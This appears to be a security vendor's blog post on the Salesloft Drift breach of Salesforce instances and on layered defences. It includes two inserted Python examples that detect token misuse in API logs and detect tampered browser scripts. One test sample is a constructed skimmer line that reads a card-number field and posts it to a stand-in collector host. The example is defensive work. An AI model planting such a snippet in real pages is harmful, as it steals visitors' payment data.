It’s standard practice for security teams at large organizations to do significant due diligence on their software vendors. They typically look for adherence to Secure by Design principles, compliance with data privacy regulations, and even whether the vendor runs background checks on the engineers who write the application, among other factors.
Just like in physical supply chains, it’s often not the primary vendor that causes an issue, but rather a vendor’s vendors. That appears to be what happened in the data breach affecting Salesforce through its integration with Salesloft’s AI chat agent, Drift.
Breaching the platform and extracting data
From early to mid-August 2025, attackers breached Salesloft’s platform to steal OAuth and refresh tokens from Drift’s integration with Salesforce. Attackers then used those tokens to access Salesforce customer instances and extract data like contacts and support case information.
Examples of the kind of data stolen include:
- Names
- Business email addresses
- Business phone numbers
- Job titles
- Regional/location details
- Content from certain support cases
The initial breach is now causing a wave of follow-on breaches at Salesforce customers. Evidence shows that attackers are mining the extracted data, support case content in particular, for credentials to other systems so they can move further into those organizations.
No Akamai platforms were involved
Akamai also investigated this incident to determine whether attackers were able to misuse OAuth tokens to access our Salesforce instance. We found that only a limited set of data stored in service support tickets had been exposed.
The reason for Akamai’s limited exposure is the automated deletion of personal and other sensitive data in support tickets 120 days after ticket closure as part of Akamai’s privacy and security by design standards. Additionally, we did not find signs of potential misuse of this data. We have notified affected customers of the incident.
This event was restricted to Salesforce. No Akamai platforms, network systems, or production services were involved. No customer traffic data processed on Akamai platforms was impacted. The affected integration was used only within Salesforce and has since been removed.
Best practices to consider
When trying to protect your organization against software supply chain risks such as this one, it’s important to apply a multilayered approach to mitigate potential attacks and quickly contain any that occur. It’s also essential to understand the organization’s security posture to find any gaps and potential ways that a supply chain risk might evade existing protections.
To help secure any gaps that might exist, consider the following layered protections for APIs and AI/LLM apps (such as the Drift chatbot):
- Microsegmentation
- Web application firewall
- API security
- Client-side protection
- Bot management
- Account takeover protection
- AI application protection
Microsegmentation
Microsegmentation should be a priority in any layered security model because it directly reduces the impact of supply chain and API-driven breaches. By isolating applications, workloads, and integrations like AI chatbots into tightly controlled zones, it limits attacker movement and shrinks the blast radius of an incident.
This means that even if stolen tokens or vulnerable APIs are exploited, the compromise is contained, critical systems remain protected, and response teams gain clear visibility to identify the threat and act faster. It turns a potential organization-wide crisis into a controlled, manageable event by protecting operations, reducing downtime, and reinforcing Zero Trust where it matters most.
Web application firewall
A web application firewall (WAF) provides the security foundation for defending against modern threats. Strong WAF technology continuously updates and tunes protections to detect anomalies in traffic patterns and to help identify behavior inconsistent with normal application use.
A WAF with the ability to rate the trustworthiness of request sources allows organizations to block traffic from known malicious or suspicious IPs. Comprehensive logging and visibility provide the context security teams need to investigate incidents and coordinate with additional protections.
API security
API-specific protections could have helped companies detect this attack by identifying the anomalous behavior associated with the compromised OAuth tokens. Even though the attacker was using valid credentials, their activity patterns — such as running mass queries against Salesforce APIs, accessing data from unusual IP addresses, and attempting to delete jobs to cover their tracks — would have deviated from the baseline of normal use.
Akamai’s behavioral analytics and continuous monitoring are designed to flag these kinds of irregularities in real time, enabling security teams to quickly investigate and respond before large volumes of sensitive data can be exfiltrated.
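The detection logic described above, run over a handful of log lines, as an added example that is not Akamai's or Salesforce's code. It assumes a simplified, constructed record layout (timestamp, integration user, client IP, event type, action, entity, rows processed) loosely modeled on the kind of fields found in Salesforce API event logs; the field names, the sample events, the baseline IP set and the thresholds are all assumptions for illustration. The three rules correspond to the three indicators named in the text: a request source not in the integration's baseline, a volume spike against the integration's normal rows-per-hour, and a job deletion in the same window as a spike.

```python
"""Flag misuse of a valid integration token from API event logs.

Added example, not Akamai's or Salesforce's code. Record layout and sample
data are constructed for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ApiEvent:
    ts: str          # ISO 8601 timestamp, UTC
    user: str        # integration user / connected-app identity
    client_ip: str
    event_type: str  # e.g. "ApiEvent", "BulkApiJob" (assumed names)
    action: str      # e.g. "query", "deleteJob" (assumed names)
    entity: str      # Salesforce object touched
    rows: int        # rows returned or processed


# Constructed baseline for the integration: its usual egress IPs (RFC 5737
# documentation addresses) and the row volume it normally pulls per hour.
BASELINE_IPS = {"203.0.113.10", "203.0.113.11"}
BASELINE_ROWS_PER_HOUR = 5_000
ROW_SPIKE_FACTOR = 10  # flag an hour that exceeds 10x the baseline volume

# Constructed sample log: two normal hours of chatbot traffic, then a bulk
# pull of three objects from a new IP followed by a deleteJob.
SAMPLE_LOG = """\
2025-08-09T02:14:03Z,drift-integration,203.0.113.10,ApiEvent,query,Contact,1200
2025-08-09T02:30:11Z,drift-integration,203.0.113.10,ApiEvent,query,Case,800
2025-08-09T03:05:44Z,drift-integration,198.51.100.23,BulkApiJob,query,Account,150000
2025-08-09T03:06:02Z,drift-integration,198.51.100.23,BulkApiJob,query,Contact,90000
2025-08-09T03:07:30Z,drift-integration,198.51.100.23,BulkApiJob,query,Case,60000
2025-08-09T03:09:15Z,drift-integration,198.51.100.23,BulkApiJob,deleteJob,Case,0
"""


def parse_line(line: str) -> ApiEvent:
    ts, user, ip, etype, action, entity, rows = line.strip().split(",")
    return ApiEvent(ts, user, ip, etype, action, entity, int(rows))


def hour_bucket(ts: str) -> str:
    # "2025-08-09T03:05:44Z" -> "2025-08-09T03"
    return ts[:13]


def analyze(events, baseline_ips=BASELINE_IPS,
            baseline_rows=BASELINE_ROWS_PER_HOUR, spike=ROW_SPIKE_FACTOR):
    """Return (rule, user, detail) findings for the three indicators."""
    findings = []

    # Rows queried per (user, hour): the volume baseline is per identity.
    rows_per_hour = defaultdict(int)
    for e in events:
        if e.action == "query":
            rows_per_hour[(e.user, hour_bucket(e.ts))] += e.rows

    # Rule 1: the token is valid, but the request source is not one the
    # integration has used before. Report each new (user, IP) pair once.
    seen = set()
    for e in events:
        key = (e.user, e.client_ip)
        if e.client_ip not in baseline_ips and key not in seen:
            seen.add(key)
            findings.append(("unusual_ip", e.user,
                             f"{e.client_ip} first seen at {e.ts}"))

    # Rule 2: mass queries, i.e. an hour far above the identity's baseline.
    spiking = set()
    for (user, hour), rows in sorted(rows_per_hour.items()):
        if rows > spike * baseline_rows:
            spiking.add((user, hour))
            findings.append(("mass_query", user,
                             f"{rows} rows in {hour}, baseline {baseline_rows}/h"))

    # Rule 3: a job deletion in the same window as a spike is consistent
    # with an attacker removing evidence of the extraction jobs.
    for e in events:
        if e.action == "deleteJob" and (e.user, hour_bucket(e.ts)) in spiking:
            findings.append(("job_cleanup", e.user,
                             f"deleteJob on {e.entity} at {e.ts} after mass query"))
    return findings


def run_sample():
    return analyze([parse_line(l) for l in SAMPLE_LOG.strip().splitlines()])


if __name__ == "__main__":
    for rule, user, detail in run_sample():
        print(f"{rule:12} {user:18} {detail}")
```

In production the baseline would be learned per identity rather than hard-coded, and the IP rule would typically be widened to ASN or geolocation, but the shape is the same: the token is valid, so the signal has to come from how it is used.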
Client-side protection
When apps use scripts or agents to pass information back and forth in the browser, it’s critical to be able to detect changes in the scripts. Is the script asking for information it doesn’t normally ask for? An inventory of all scripts and a way to flag script changes can prevent these kinds of attacks.
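A minimal version of that inventory, as an added example that is not Akamai's code: each first-party or third-party script is recorded by URL with a subresource-integrity style hash and the set of form fields it reads, and a later observation is diffed against it. The chat-widget script, the hypothetical `card-number` field and the `collector.invalid` host are constructed for the example; the field extraction is a deliberately simple regex over `getElementById` / `querySelector` calls and would need to be broadened for real bundles.

```python
"""Script inventory with change and new-field detection.

Added example, not Akamai's code. Scripts and field names are constructed.
"""
import base64
import hashlib
import re

# Fields a script reads via getElementById("x") or querySelector("#x").
# Intentionally narrow; real bundles need a proper parser.
FIELD_RE = re.compile(
    r"""(?:getElementById|querySelector)\(\s*['"]#?([A-Za-z_][\w-]*)['"]\s*\)"""
)

# Constructed baseline: the chat widget collects a name and an email.
BASELINE_CHAT_JS = """
const name = document.getElementById("visitor-name").value;
const email = document.getElementById("visitor-email").value;
post("/chat/start", {name, email});
"""

# Constructed tampered copy: same script, plus a new field sent elsewhere.
TAMPERED_CHAT_JS = BASELINE_CHAT_JS + """
const card = document.querySelector("#card-number").value;
post("https://collector.invalid/x", {card});
"""


def sri_hash(src: str) -> str:
    """SRI-format digest, the same value a <script integrity=...> would carry."""
    digest = hashlib.sha384(src.encode("utf-8")).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


def referenced_fields(src: str) -> set:
    return {m.group(1) for m in FIELD_RE.finditer(src)}


def build_inventory(scripts: dict) -> dict:
    """scripts: url -> source. Returns url -> {"sri": ..., "fields": set()}."""
    return {url: {"sri": sri_hash(src), "fields": referenced_fields(src)}
            for url, src in scripts.items()}


def audit(inventory: dict, observed: dict) -> list:
    """Diff observed scripts (url -> source) against the inventory.

    Returns (finding, url, new_fields) tuples:
      changed    - hash differs; new_fields lists fields not read before
      new_script - url not in inventory; new_fields lists everything it reads
      missing    - inventoried script no longer served
    """
    findings = []
    for url, src in observed.items():
        if url not in inventory:
            findings.append(("new_script", url, sorted(referenced_fields(src))))
            continue
        if sri_hash(src) != inventory[url]["sri"]:
            added = referenced_fields(src) - inventory[url]["fields"]
            findings.append(("changed", url, sorted(added)))
    for url in inventory.keys() - observed.keys():
        findings.append(("missing", url, []))
    return sorted(findings)


def run_sample():
    inv = build_inventory({"/static/chat.js": BASELINE_CHAT_JS})
    unchanged = audit(inv, {"/static/chat.js": BASELINE_CHAT_JS})
    tampered = audit(inv, {"/static/chat.js": TAMPERED_CHAT_JS,
                           "/static/extra.js": "x = document.getElementById('ssn');"})
    return unchanged, tampered


if __name__ == "__main__":
    unchanged, tampered = run_sample()
    print("unchanged:", unchanged)
    for finding in tampered:
        print(*finding)
```

A changed hash alone tells you the script moved; the field diff is what turns that into a question a human can answer quickly, namely why the chat widget suddenly wants a card number.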
Bot management
Strong bot detection and bot management is important since AI/LLM bots are just that: bots. It’s especially critical for known bots like the Drift chatbot, for which the bot management solution can use the signature and other defining characteristics to determine if the bot is legitimate or an impersonator, and whether the bot is demonstrating risky behaviors compared with its baseline behavior.
Account takeover protection
Although the compromised identity in this case was a non-human one (the Drift integration’s OAuth token), account takeover protection solutions are built for exactly this situation: detecting when correct credentials are being used by someone other than the legitimate owner.
Assigning a risk score to each login can stop the attacker before access is granted, and session behavior monitoring can spot risky activity and end the session if the attacker does get in.
AI application protection
Generative AI-powered applications are an increasingly exposed part of the enterprise attack surface. An attacker with access to the AI application could manipulate the app or weaken its guardrails so that it returns malicious or toxic responses to user prompts, or extract information from the app directly. AI-specific protections are therefore an important layer in defending these applications.
Apply a multilayered security approach
Organizations will likely never have the resources to do due diligence on every vendor in their software supply chain. And even if they did find some vulnerabilities, it likely would be impractical to avoid using some of the major software vendors or asking those vendors to change their technology partners.
As a result, the most realistic solution is to apply a multilayered security approach to protect against supply chain breaches.